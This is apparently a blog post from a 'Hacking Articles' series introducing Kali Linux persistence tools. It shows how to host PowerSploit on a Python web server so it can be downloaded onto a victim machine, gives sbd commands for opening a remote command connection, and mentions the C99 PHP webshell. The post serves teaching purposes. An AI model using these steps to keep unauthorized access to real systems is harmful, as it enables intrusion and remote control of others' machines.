Hacking Articles Part 26

51 3 0
                                        

Kali Linux - Maintaining Access

[Disclaimer: The content of this article is for educational purposes only. It was written to help readers test their skills on using computers and/or Kali Linux and share knowledge about Kali Linux to the users. The writer of this article/guide take no responsibility for actions resulting from the inappropriate usage of informations contained of this article/guide.]

4 more articles to go guys, thanks for always being there always and you read this article even it was so hard to understand for a normal people. Lately, I've been doing some of my article/guide in all English and that was for my friends out there (Foreigners) so they can also read some of my articles because one of them pm me lately and request this one 😊 Okay Let's Go!

Powersploit

-This is a tool that is for Windows machines and has a PowerShell installed in victim's machine. This can helps the hacker to connect with the victim's machine via PowerShell.

To open Powersploit, you need to type the following command in the terminal:

cd /usr/share/powersploit

If you type "ls" it will list all the powersploit tools that you can download and install in the victim's machine after you have gained access. Most of them are name self-explained according to their names.

But what is the easiest way to download this tool to the victim's machine?

You just need to create a web server, which powersploit tools allow to create easily using the following command: "python -m SimpleHTTPServer"

After this one, if you type: http://<Kali machine ip_address>:8000/ the following picture below is the result:

After this one, if you type: http://<Kali machine ip_address>:8000/ the following picture below is the result:

Oops! Ang larawang ito ay hindi sumusunod sa aming mga alituntunin sa nilalaman. Upang magpatuloy sa pag-publish, subukan itong alisin o mag-upload ng bago.

Sbd

-It was similar to Netcat and it is portable and can be used in both Windows and Kali machines. It features AES-CBC-128 + HMAC-SHA1 encryption> and it helps to connect to a victim's machine anytime on a specific port and send commands remotely.

To open this one, go to the terminal and type "sbd -l -p port" for the server to accept connections.

On the Victim's site, type "sbd IPofServer port" then a connection will be established where we can send the remote commands.

In this article, it is "localhost" since we performed the test on the same machine.

After a short period of time, on the server you will see that a connection has occurred.

Webshells

-this one can be used to maintain access or to hack a website but most of them are detected by antiviruses. Are you familiar with the word C99 php shell? This one is very well known among the antivirus and any common antivirus will easily detect it as a malware. So, you need their main function to send the system command via web interfaces.

Hacking ArticlesTahanan ng mga kuwento. Tumuklas ngayon